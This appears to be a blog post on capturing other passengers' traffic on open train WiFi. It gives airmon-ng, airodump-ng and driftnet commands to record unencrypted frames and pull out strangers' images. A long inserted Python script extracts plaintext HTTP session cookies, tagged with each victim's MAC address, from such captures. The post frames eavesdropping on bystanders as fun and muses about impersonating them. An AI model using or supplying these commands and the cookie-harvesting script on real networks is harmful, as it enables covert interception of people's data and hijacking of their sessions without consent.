Capture WiFi traffic on Linux

posted on 2013-03-01

Some of the public trains in the Netherlands have free WiFi. To get online you connect to a simple open network, agree to the terms, and you can start using it.

Because the WiFi is an open network, every packet going in and out flies through the air without any link-layer encryption. Any client that does not use some kind of protocol-level encryption is broadcasting its data to everyone in range, including any cookies and session information it sends over plain HTTP (not HTTPS, of course). Theoretically you could join somebody's online game or impersonate them by having your browser access everything they access (I would love to see a Selenium implementation for this!).

Let's have some simple fun by capturing all the packets using the aircrack-ng suite and then extracting all the images we can find using driftnet. First we put our wireless device into monitor mode:

sudo airmon-ng start wlan0

As you can see, my wireless device is wlan0; you can find out yours by running iwconfig and picking the device that reports wireless extensions.

The output of airmon-ng start will tell you which monitor interface it has created (usually mon0; again, you can check with iwconfig). You should now be able to capture packets from it using sudo airodump-ng --write captured mon0. But because we are only interested in some of the packets, let's narrow our capture.

First find out the channel, so airodump-ng does not have to hop channels (and miss frames while it is tuned elsewhere). Run sudo iwlist scan | less and pick the channel you are interested in (--channel 1). We only need pcap output for Wireshark and driftnet (--output-format pcap), and we only find unencrypted networks interesting (--encrypt OPN).

This sums up to (the -a flag additionally filters out clients that are not associated with any access point):

sudo airodump-ng --encrypt OPN --output-format pcap -a --channel 1 --write captured mon0

We should now have a file called captured-01.cap (airodump-ng appends a counter to the --write prefix). You can analyze all packets by opening the file in Wireshark. But there is another fun thing you can try: extract all images you can find using driftnet.
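Wireshark is the comfortable way to look at the capture, but the cookie leak described at the top of the post is easy to pull out with a script too. The following is an added example, not code from the original post or from the aircrack-ng project: it reads a classic pcap file of raw 802.11 frames (link type 105, which is assumed here to be what airodump-ng --output-format pcap writes; captures taken with tcpdump on mon0 usually carry a radiotap header, link type 127, and that case is handled as well), strips the 802.11, LLC/SNAP, IPv4 and TCP headers with the standard library only, and reports every plaintext HTTP request carrying a Cookie header together with the station MAC that sent it. The sample capture at the bottom is constructed in the script itself (station MACs, the BSSID and the server address 198.51.100.10 are made up) so it runs offline; to run it on a real file, pass the bytes of captured-01.cap to extract_http_cookies instead of SAMPLE_PCAP.

```python
# Added example, not code from the original post: pull HTTP Cookie headers out of
# an airodump-ng capture of an open network, with the standard library only.
# The capture at the bottom is constructed in-line so the script runs offline.
import struct

LINKTYPE_IEEE802_11 = 105   # assumed for airodump-ng --output-format pcap: raw 802.11 frames
LINKTYPE_RADIOTAP = 127     # tcpdump/Wireshark on mon0: radiotap header before the frame
LLC_SNAP_IPV4 = b'\xaa\xaa\x03\x00\x00\x00\x08\x00'


def iter_pcap(data):
    # Classic pcap: 24-byte global header, then (ts_sec, ts_usec, incl_len, orig_len) + frame
    magic, = struct.unpack('<I', data[:4])
    end = {0xa1b2c3d4: '<', 0xd4c3b2a1: '>'}.get(magic)
    if end is None:
        raise ValueError('not a classic pcap file')
    linktype, = struct.unpack(end + 'I', data[20:24])
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(end + 'IIII', data[off:off + 16])[2]
        yield linktype, data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len


def strip_80211(frame):
    # Returns (transmitter MAC, IPv4 packet) for an unprotected 802.11 data frame, else None
    if len(frame) < 24:
        return None
    ftype, subtype, flags = (frame[0] >> 2) & 0x3, frame[0] >> 4, frame[1]
    if ftype != 2 or subtype & 0x04 or flags & 0x40:   # not data / null-data / Protected bit set
        return None
    hdr_len = 24 + (6 if (flags & 0x03) == 0x03 else 0) + (2 if subtype & 0x08 else 0)  # addr4, QoS
    if frame[hdr_len:hdr_len + 8] != LLC_SNAP_IPV4:
        return None
    return ':'.join(f'{b:02x}' for b in frame[10:16]), frame[hdr_len + 8:]   # addr2 = sender


def parse_ipv4_tcp(pkt):
    # Returns (dst_ip, dst_port, tcp_payload) or None; the IP total length drops a trailing FCS
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    pkt = pkt[:struct.unpack('!H', pkt[2:4])[0]]
    tcp = pkt[(pkt[0] & 0xF) * 4:]
    dport, = struct.unpack('!H', tcp[2:4])
    return '.'.join(str(b) for b in pkt[16:20]), dport, tcp[(tcp[12] >> 4) * 4:]


def parse_http_request(payload):
    # Returns (request line, {lower-cased header: value}) or None if not a plaintext HTTP request
    if not payload.startswith((b'GET ', b'POST ')) or b'\r\n\r\n' not in payload:
        return None
    lines = payload.split(b'\r\n\r\n', 1)[0].decode('latin-1').split('\r\n')
    headers = dict((k.strip().lower(), v.strip()) for k, _, v in (l.partition(':') for l in lines[1:]))
    return lines[0], headers


def extract_http_cookies(pcap_bytes):
    # Every plaintext HTTP request in the capture that carries a Cookie header
    findings = []
    for linktype, frame in iter_pcap(pcap_bytes):
        if linktype == LINKTYPE_RADIOTAP:       # radiotap length is little-endian at offset 2
            frame = frame[struct.unpack('<H', frame[2:4])[0]:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError(f'unsupported link type {linktype}')
        stripped = strip_80211(frame)
        tcp = parse_ipv4_tcp(stripped[1]) if stripped else None
        http = parse_http_request(tcp[2]) if tcp else None
        if http and 'cookie' in http[1]:
            findings.append({'station': stripped[0], 'server': f'{tcp[0]}:{tcp[1]}',
                             'host': http[1].get('host', ''), 'request': http[0],
                             'cookie': http[1]['cookie']})
    return findings


# --- constructed sample capture (checksums left zero; nothing above verifies them) ---
def _ipv4_tcp(src_ip, dst_ip, sport, payload):
    tcp = struct.pack('!HHIIBBHHH', sport, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    return struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, src_ip, dst_ip) + tcp


def _data_frame(station, bssid, ip_pkt, qos=False):
    # ToDS=1 (station -> AP): addr1 = BSSID, addr2 = station, addr3 = destination
    hdr = bytes([0x88 if qos else 0x08, 0x01, 0, 0]) + bssid + station + bssid + b'\x00\x00'
    return hdr + (b'\x00\x00' if qos else b'') + LLC_SNAP_IPV4 + ip_pkt


def _pcap(frames, linktype=LINKTYPE_IEEE802_11):
    out = struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack('<IIII', 1362096000 + i, 0, len(f), len(f)) + f
    return out


BSSID, SERVER = bytes.fromhex('0200000000aa'), bytes([198, 51, 100, 10])   # made-up BSSID, RFC 5737 IP
SAMPLE_PCAP = _pcap([
    b'\x80\x00' + b'\x00' * 22,   # a beacon (management frame): ignored
    _data_frame(bytes.fromhex('020000000001'), BSSID, _ipv4_tcp(bytes([10, 0, 0, 5]), SERVER, 40001,
        b'GET /account HTTP/1.1\r\nHost: example.com\r\nCookie: session=abc123; user=alice\r\n\r\n')),
    _data_frame(bytes.fromhex('020000000002'), BSSID, _ipv4_tcp(bytes([10, 0, 0, 6]), SERVER, 40002,
        b'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n'), qos=True),            # no cookie: not reported
    _data_frame(bytes.fromhex('020000000002'), BSSID, _ipv4_tcp(bytes([10, 0, 0, 6]), SERVER, 40003,
        b'POST /login.php HTTP/1.1\r\nHost: example.net\r\nCookie: PHPSESSID=deadbeef\r\n\r\n'), qos=True),
])

if __name__ == '__main__':
    for f in extract_http_cookies(SAMPLE_PCAP):
        print(f"{f['station']} -> {f['host']} ({f['server']}) {f['request']}\n    Cookie: {f['cookie']}")
```

The parser deliberately skips frames with the Protected bit set: on a WEP or WPA network the payload after the 802.11 header is ciphertext and there is nothing to read without the key, which is exactly why --encrypt OPN was used above. TCP segments are handled one at a time, so a request split across several segments would be missed; reassembly is what Wireshark's "Follow TCP Stream" does for you.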

mkdir images
driftnet -f captured-01.cap -d images -a

This tells driftnet to read from the capture file (-f), dump any images it finds in the images directory (-d) and leave the whole GUI out of it (-a, adjunct mode).

You could also run driftnet on your monitoring interface mon0 directly, but make sure you are prepared for what might pop up on your screen.

Happy hacking!